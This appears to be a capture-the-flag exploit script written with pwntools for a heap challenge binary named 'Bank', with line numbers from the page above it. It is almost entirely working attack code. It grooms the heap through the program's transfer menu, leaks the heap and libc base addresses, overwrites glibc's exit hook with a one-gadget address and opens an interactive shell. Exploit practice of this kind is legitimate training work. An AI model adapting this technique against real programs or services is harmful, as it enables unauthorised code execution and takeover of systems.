1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104
|
from imp import NullImporter from pwn import * context(arch = 'amd64',os = 'linux',log_level = 'debug') elf = ELF('./Bank') DEBUG = 1 if DEBUG: libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so") ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/ld-2.31.so") p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path}) else: ip = '127' port = 30007 p = remote(ip, port) def debug(info='b main'): gdb.attach(p, info)
def login(): p.sendlineafter(b"Click: ", b'Login') p.sendlineafter(b"Card Numbers: ", b'1') p.sendlineafter(b"Password: ", b'1'*6)
def depo(num): p.sendlineafter(b"Click: ", b"Deposit") p.sendafter(b"How Much?", str(num).encode('ascii'))
def put(num): p.sendlineafter(b"Click: ", b"Put") p.sendafter(b"How Much?", str(num).encode('ascii'))
def tran(num, content, user=''): p.sendlineafter(b"Click: ", b"Transfer") p.sendlineafter(b"who? ", user.encode('ascii')) if user == 'admin': p.sendafter(b"How much? ", str(num).encode('ascii'))
elif user == 'hacker': p.sendafter(b"How much? ", str(num).encode('ascii')) p.recvuntil(b"hacker: Great!") p.send(str(content).encode('ascii'))
elif user == 'guest': p.sendafter(b"How much? ", str(num).encode('ascii')) p.recvuntil(b"data: ") p.send(content)
elif user == 'ghost': p.sendafter(b"How much? ", str(num).encode('ascii')) p.recvuntil(b"ghost: &^%$#@! :)\n") p.send(str(content).encode('ascii'))
elif user == 'abyss': p.sendafter(b"How much? ", str(num).encode('ascii')) p.send(str(content).encode('ascii'))
login() put(0x190) tran(0xb, 0x38, 'ghost') tran(6, p64(0)+p64(0x421), 'guest') tran(0xb, 0x48, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0xb, 0x58, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0xb, 0x68, 'ghost') tran(0x1f, 'a', 'admin') p.recvuntil(b"I think 0x") heap = int(p.recv(12), 16) - 0x10 log.info("heap_base==>0x%x" %heap) tran(0xb, 0x78, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0xb, 0x88, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0xb, 0x98, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0xb, 0x100, 'ghost') tran(6, b'a'*0x10, 'guest') tran(0x33, heap+0x310, 'hacker') tran(6, b'a'*0x10, 'guest') tran(6, b'a'*0x10, 'guest') tran(6, b'a'*0x10, 'guest') tran(6, b'a'*0x10, 'guest') tran(0x1f, 'a', 'admin') p.recvuntil(b"I think 0x") leak = int(p.recv(12), 16) - 0x1ebbe0 log.info("libc_base==>0x%x" %leak) exit_hook = leak + 0x426f68 ogg = leak + 0xe6c7e tran(0x33, heap+0x2a0, 'hacker') tran(6, p64(exit_hook), 'guest')
tran(1, ogg, 'abyss')
p.interactive()
|